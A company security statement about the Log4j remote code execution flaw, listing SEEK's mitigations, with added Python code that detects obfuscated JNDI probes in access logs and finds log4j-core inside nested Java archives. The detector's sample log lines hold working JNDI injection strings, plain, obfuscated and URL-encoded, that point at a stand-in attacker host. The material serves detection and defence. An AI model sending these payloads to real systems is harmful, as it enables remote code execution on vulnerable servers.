Log4j Security Issue

Jenni
Published in SEEK blog, Dec 23, 2021

11 December 2021
(Updated 20 December 2021)


It was recently announced that log4j, a popular logging library used by many Java applications, is vulnerable to remote code execution (CVE-2021-44228). We recognise that you are tracking this rapidly evolving issue across your vendors. This is a summary of SEEK’s response to date; as this is an active investigation, our ability to respond to custom questionnaires at this time is limited.

Immediately following the disclosure of the log4j vulnerability, SEEK’s Cyber Security team began investigating the impact on our internal systems and on our customers, job seekers, and hirers. We take these vulnerabilities very seriously, and this was made a top priority at a company level by SEEK’s CEO.

We identified a number of services using affected versions of log4j, and these were quickly remediated by our engineering teams. After extensive and continuing examination, we have found no indication of compromise of any customer, job seeker, or hirer data as at the time of publishing this statement. Multiple layers of mitigation were already in place across our environments when this vulnerability was announced, and we have implemented additional controls to directly address this risk. A summary of those controls follows:

  • Applied the updates to our systems and source code repositories, initially deploying version 2.15.0 and, as the follow-up advisories (CVE-2021-45046 and CVE-2021-45105) changed the guidance, moving to 2.16.0 and most recently 2.17.0.
  • Deployed web application firewall rules that block probing for the ${jndi: string, including the modified or obfuscated forms of that string used to attempt a WAF bypass.
  • Scanned for log4j code present outside an easily found log4j .jar file, for example repackaged inside another application archive.
  • Implemented outbound egress filtering on the network firewalls (exploitation relies on the vulnerable host connecting out to an attacker-controlled JNDI endpoint), and updated signatures to block log4j-related scanning traffic.
  • Leveraged an attack surface management (ASM) platform that continuously discovers, inventories and assesses the digital assets we expose to external attack.
  • Continued running a public bug bounty program across SEEK — https://bugcrowd.com/seek
  • Continued penetration testing and red team simulations, through hands-on analysis by SEEK’s Offensive Security team and through our breach and attack simulation platform.
  • Engaged our external 24/7 managed security operations centre (MSOC) provider to understand the additional detection strategies they are integrating for this risk.
  • Updated all security solutions (EDR, NDR, vulnerability management and dependency vulnerability platforms) so that they carry the signatures or details needed to detect related threat and vulnerability activity.
  • Our security incident response and threat intelligence teams continue to actively monitor the situation, incorporating new advisories into our strategy as appropriate.
  • We continue to work with our peers across the information security community, sharing indicators of compromise, mitigation guidance and intelligence on how the vulnerability is being abused. As new information emerges, we will adjust our approach accordingly.
  • Tracked the public statements of each affected vendor and, where practical, patched those services. Where updates have not yet been made available, we have deployed other countermeasures and will follow up with patches as they are released.
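
The WAF bullet above hinges on catching the ${jndi: string after attackers have hidden it behind Log4j's own lookup syntax. The following is an added example, not SEEK's WAF rules or code from any of their vendors: it emulates the small subset of Log4j lookup evaluation that the common obfuscations rely on (the lower:/upper: lookups and the ${name:-default} fallback, plus URL decoding), collapses nested lookups from the inside out, and then matches the canonical ${jndi: form. The access-log lines, the hostnames and the IP addresses are constructed sample data.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body that contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once the obfuscation has been peeled away (mixed case, stray spaces).
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(m):
    """Emulate only the Log4j lookups attackers use to hide the word 'jndi':
    ${lower:X}, ${upper:X} and the ${name:-default} fallback. The jndi lookup
    itself and any other lookup type are left untouched."""
    body = m.group(1)
    name, has_default, default = body.partition(":-")
    prefix, sep, arg = name.partition(":")
    key = prefix.strip().lower()
    if key == "lower" and sep:
        return arg.lower()
    if key == "upper" and sep:
        return arg.upper()
    if has_default:
        # ${::-j}, ${env:NOPE:-j}, ${k8s:k5:-}: the lookup fails or is empty,
        # so Log4j substitutes the literal default text.
        return default
    return m.group(0)


def normalize(text):
    """URL-decode (repeatedly, to defeat double encoding) and collapse nested
    lookups until the string stops changing."""
    while True:
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    while True:
        collapsed = _INNER.sub(_resolve_inner, text)
        if collapsed == text:
            return text
        text = collapsed


def is_jndi_probe(text):
    """True if the normalized text contains a JNDI lookup."""
    return _JNDI.search(normalize(text)) is not None


def scan_access_log(lines):
    """Return (line_number, normalized_line) for each line carrying a probe."""
    return [(n, normalize(line)) for n, line in enumerate(lines, 1) if is_jndi_probe(line)]


# Constructed sample access-log lines (not real traffic); hosts are RFC 5737 / .example.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [11/Dec/2021:03:14:08 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [11/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.example/a}"',
    '203.0.113.9 - - [11/Dec/2021:03:14:10 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '203.0.113.9 - - [11/Dec/2021:03:14:11 +0000] "GET /?q=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Adns%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '203.0.113.7 - - [11/Dec/2021:03:14:12 +0000] "GET /pricing?plan=${lower:PRO} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, normalized in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {normalized}")
```

The last sample line contains a lookup but no JNDI reference and is deliberately left unflagged: matching on a bare "${" is a much noisier rule than normalizing first. The emulation is intentionally partial (it does not evaluate env, sys, date or other lookups), so a rule built on it should be treated as a signature that raises the bar, not as proof that no bypass remains.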

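The scanning bullet above covers the case a filename-based inventory misses: log4j-core repackaged inside a WAR, EAR or shaded application jar. The following is an added example and not SEEK's scanner: it walks an archive recursively, reports every level that contains JndiLookup.class, and reads the log4j-core version from the Maven pom.properties where one survives. The sample WAR and its contents are constructed in memory (class-file magic bytes stand in for real bytecode), and is_fixed() encodes the final December 2021 fix levels (2.17.0, with 2.12.3 and 2.3.1 as the Java 7 and Java 6 backports); those thresholds are this example's assumption about what counts as patched.

```python
import io
import re
import zipfile

# Class whose presence makes the JNDI lookup available to a log4j-core build.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
_VERSION_RE = re.compile(r"^version=(\S+)", re.MULTILINE)


def is_fixed(version):
    """True if this log4j-core version carries the final Dec-2021 fixes
    (2.17.0, or the backports 2.12.3 / 2.3.1). None if the version is unknown.
    Presence of JndiLookup.class alone is not enough: 2.17.0 still ships it,
    with JNDI disabled by default."""
    try:
        major, minor, patch = (int(x) for x in version.split(".")[:3])
    except ValueError:
        return None
    if major != 2:
        return None
    if minor == 12:
        return patch >= 3
    if minor == 3:
        return patch >= 1
    return (minor, patch) >= (17, 0)


def scan_archive(data, path, findings=None):
    """Recursively walk a zip/jar/war/ear held in memory. Each archive level that
    contains JndiLookup.class is recorded with the version declared in its
    pom.properties, or 'unknown' when the metadata was stripped by shading."""
    if findings is None:
        findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if JNDI_CLASS in names:
            version = "unknown"
            if POM_PROPS in names:
                m = _VERSION_RE.search(zf.read(POM_PROPS).decode("utf-8", "replace"))
                if m:
                    version = m.group(1)
            findings.append({"path": path, "version": version, "fixed": is_fixed(version)})
        for name in names:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive(zf.read(name), f"{path}!/{name}", findings)
    return findings


def _zip_bytes(entries):
    """Build an in-memory zip from a {name: bytes} mapping (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_war():
    """Constructed sample: a WAR bundling a vulnerable log4j-core, a shaded
    application jar containing JndiLookup.class with its Maven metadata stripped,
    and an unrelated library that must not be reported."""
    magic = b"\xca\xfe\xba\xbe"  # class-file magic stands in for bytecode
    vulnerable_core = _zip_bytes({
        JNDI_CLASS: magic,
        POM_PROPS: b"version=2.14.1\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n",
    })
    shaded = _zip_bytes({"com/example/Main.class": magic, JNDI_CLASS: magic})
    harmless = _zip_bytes({"com/example/util/Strings.class": magic})
    return _zip_bytes({
        "WEB-INF/lib/log4j-core-2.14.1.jar": vulnerable_core,
        "WEB-INF/lib/app-all.jar": shaded,
        "WEB-INF/lib/commons-lang.jar": harmless,
    })


if __name__ == "__main__":
    for finding in scan_archive(build_sample_war(), "app.war"):
        print(finding)
```

On a real host the same scan_archive() is fed the bytes of each archive found on disk; a finding with version "unknown" is the shaded case the bullet describes and needs a manual look (or a class-file hash comparison) before it can be closed.
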
Liam Connolly
Chief Information Security Officer
SEEK Ltd.
